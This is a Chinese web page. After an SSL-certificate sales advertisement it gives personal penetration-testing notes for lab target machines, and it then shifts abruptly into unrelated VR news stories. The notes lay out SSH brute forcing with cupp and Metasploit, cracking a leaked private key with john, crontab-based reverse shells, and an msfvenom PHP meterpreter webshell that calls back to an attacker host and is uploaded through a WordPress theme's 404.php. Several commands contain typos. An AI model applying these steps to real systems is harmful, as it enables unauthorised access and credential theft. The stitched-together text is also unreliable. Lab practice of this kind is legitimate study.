重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
本人笔记,仅供参考
古浪ssl适用于网站、小程序/APP、API接口等需要进行数据传输应用场景,ssl证书未来市场广阔!成为创新互联建站的ssl证书销售渠道,可以享受市场价格4-6折优惠!如果有意向欢迎电话联系或者加微信:028-86922220(备注:SSL证书合作)期待与您的合作!
相关靶机:
链接:
提取码:qd32
渗透分析:
对于开启ssh服务的22端口的靶场优先考虑
1.暴力破解
2.私钥泄露
对于开放http服务的80端口或者其他端口的靶场优先考虑(特别注意大于1024的端口)
1.通过浏览器访问对应靶场http服务如地址:端口号
2.使用探测工具对http的目录进行探测,如dirb 地址:端口号
挖掘敏感信息:
使用浏览器对靶场IP的http服务探测,对页面中展示的内容也要注意,尤其是联系人等信息(有可能就是ssh的用户名信息), 递归访问,力争把每一个dirb扫描到的目录页面都访问查看;
尤其对robots.txt、以及一些目录进行访问,挖掘具备利用价值的信息。对于开放ssh服务的靶场,务必要注意是否可以寻找到ssh私钥信息(id_ rsa);
对于某些靶场,也可以使用nikto扫描器来挖掘敏感信息;
-- nikto -host靶场IP地址
特别注意config等特殊敏感文件,要细读扫描的结果。挖掘可以利用的敏感信息;
登录服务器之后,我们需要做以下操作。
1、查看当前用户whoami .
2、id 查看当前用户的权限
3、查看根目录寻找flag文件
如果是root权限,那么表明这个靶场就被全部拿下。但是如果不是,就肯定需要提权。一
般情况下,flag文件只属于root用户和对应的用户组:
cat /etc/passwd查看所有用户的列装
cat /etc/group查看用户组
find / -user用户名查看属于某些用户的文件
/tmp查看缓冲文件目录
深入挖掘
通过/etc/crontab文件,设定系统定期执行的任务,编辑,需要roor权限。不同的用户都可以有不同的定时任务
cat /etc/crontab挖掘其他用户是否有定时任务,并查看对应的任务内容。执行的任务肯定对应靶场机器的某个文件。
如果在/etc/crontab下有某个用户的定时计划文件,但是具体目录下没有这个定时执行的文件,可以自行创建反弹shell,然后netcat执行监听获取对应用户的权限。
如果有定时执行的文件,可以切换到对应的目录,查看对应的权限,查看当前用户是否具有读写权限。
万不得已的时候只能对ssh服务进行暴力破解。破解最后一个
用户名。破解工具如hydra、medusa等;
利用cupp创建字典
git clone
chmod +x cupp.py
./cupp.py -i以交互的方式创建字典
输入用户名然后一直回车到Do you want to add some random numbers at the end of words?输入yes其他全部no此时创建完成
之后推荐用metasploit破解ssh
在终端中输入
msfconsole
msf use auxiliary/scaner/ssh/ssh_ login(使用该模块)
set rhosts 192.168.56.103(确定ip地址)
set username 用户名(破解的用户名)
set pass_ file 用户名.txt(刚刚创建的字典)
set threads 5(输入线程)
Run(进攻)
此时破解出密码例如123
直接连接,如果出现问题可以重启msfconsole,启用该模块后
set rhosts 192.168.56.103 (连接远程主机)
set username hadi(用户名)
Set password 123(密码)
Run
界面简陋就使用python优化界面
Python -c “import pty;pty.spawn(‘/bin/bash’)”(优化界面)
此时可以把自己权限提升到root:
su - root
回到根目录ls打开flag文件
Ssh秘钥泄露
解密Ssh秘钥信息(以秘钥名id_isa举例)
Chmod 600 id_isa(赋予is_isa可读可写权限)
ssh2john id_isa isacrack (就是用ssh2john把秘钥里的东西转换成john可识别的)
Zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacracks(利用rockyou字典解出所需要的东西)
制作webshell
msfvenom -p php/meterpreter/reverse_tcp Ihost=攻击机IP地址Iport=4444 -f raw /root/Desktop/shell.php
启动监听
msf use exploit/multi/handler
msf exploit(handler) set payload php/meterpreter/reverse_tcp
Weoshell
msf exploit(handler) set Ihost攻击机IP地址
msf exploit(handler) set lport 4444
msf exploit(handler) run
上传Webshell
使用找到的敏感信息登录系统后台,上传webshell。 执行
webshel(访问具有webshell的php页面)
获得反弹的shell
--
wordpress.上传点theme 404.php
执行: http://靶场IP/wordpress/wp-content/themes/twentyfourteen/404.php
1.博客系统WordPress全面支持WebVR
据WordPress官方博客,所有基于WordPress框架的博客系统都将会具备支持VR内容的特性。该博客框架系统将会支持360度图片、360度视频内容,允许通过桌面电脑、移动手机以及VR头显进行浏览观看。
跟YouTobe、Facebook的浏览方式类似,通过桌面电脑浏览器,用户可以点击拖放图片、视频来改变视野以浏览内容。如果用户有VR头显,还可以戴上VR头显设备进行沉浸式浏览。
在移动端,360度图片和视频内容会根据手机或平板的陀螺仪来改变视野,以适应用户的视野及旋转运动,或者也可以通过点击拖放进行查看。此外,用户还可以将手机放置于Cardboard类的VR眼镜盒进行浏览,跟桌面VR头显浏览方式类似,带来360度沉浸式体验。
WordPress所采用的是WebVR API,而WebVR标准本质上允许消费者从网站和网络应用中直接访问VR内容的构建模块。WordPress表示,基于WordPress框架的博客系统每个月都有接近4.09亿的活跃用户,这对WebVR的普及将启动巨大推动作用。
2.依靠大脑的刺激也可以感受到VR
在《攻壳机动队》、《黑客帝国》、《刀剑神域》等许多科幻作品中都有直接刺激大脑然后让人体感虚拟世界的设定,这也是当初人们所设想的真正的虚拟现实(VR)。近日美国华盛顿大学的研究团队便发表了一次这样的 VR 实验成功的消息。
这项研究邀请了实验者参与一个游戏,这个游戏是一个走迷宫类型的游戏,游戏中有 21 种迷宫,选项就是前进或下降,实验者看不到的迷宫的地图,研究者通过电磁刺激大脑的特定部位,让实验者看到虚拟的游戏影像(光幻视)然后再有他们自己选择前进还是下降,就结果而言受到研究者指导的实验者正确选择率为 92%,没有受到研究者指导的话正选率为 15%,这项实验让研究团队十分兴奋。
团队负责人表示这项研究就是在开发人类的的第六感,与现在的 VR 技术需要外置的头盔或者眼镜不同,这次的实验只是通过刺激大脑就让人类可以玩虚拟的游戏,目前该团队正在研究刺激的位置和刺激强度,希望能通过刺激人类大脑创造出更多的虚拟景象和感觉,这个研究的究极目标就是能够通过刺激人类大脑做出像科幻作品中一样的虚拟空间,而另一个目标就是利用这项技术帮助视觉障碍者,即便不通过双眼,依靠大脑的刺激也可以感受到外界的环境(虚拟的)。
3.《Gate Box》宣布正式开放预售
参与过《神之战:穿越时空》、《女神巡回》、《爱相随》等多款游戏开发的日本漫画家箕星太朗所设计角色的全息投影装置《Gate Box》今日宣布正式开放预售。
日本的一家公司在开发全息交互的二次元萌妹子装置,今天这个装置正式开启预约,而预约的售价高达 32 万日元(将近 2 万人民币)。
这家公司之所以想要做这个装置,最初的想法就是打破次元壁,而该产品要是实现商品化的话需要 9000 万日元的资金,并且进行了众筹活动,结果还真就筹到了设备生产制造的启动资金。 GateBox 只在美国和日本两个国家提供预购,售价均为 32 万 1840 日元,日本地区暂定的预购数量是 300 台左右,现在预购明年 12 月才会正式发货。
4.《致命VR》:为了成为FBI进行设计特训
说起著名游戏《百战天虫》(Worms)相信大家并不会陌生,其背后的开发商Team17现在也决心往虚拟现实技术迈出自己的第一步:在上个月这家企业发行了由Three Fields Entertainment为HTC Vive量身打造的射击游戏《致命VR》(Lethal VR),虽然官方也表明这款游戏即将在索尼PSVR上推出,但在当时并没有给出具体的时间计划---好在今天官方终于给出了确认消息。
《致命VR》是一款纯粹的第一人称靶场射击游戏,重点突出一个快速反应、精确的瞄准以及足够致命的射击技巧。在游戏中玩家将扮演一名新晋加入美国联邦调查局的探员,需要在射击场中证明自己的枪械技巧。根据游戏设置玩家需要完成一系列的挑战,包括固定位置射击、移动目标射击、人质拯救以及上述这些内容的混合。当然作为一款射击游戏没有各种华丽丽的枪械怎么可以!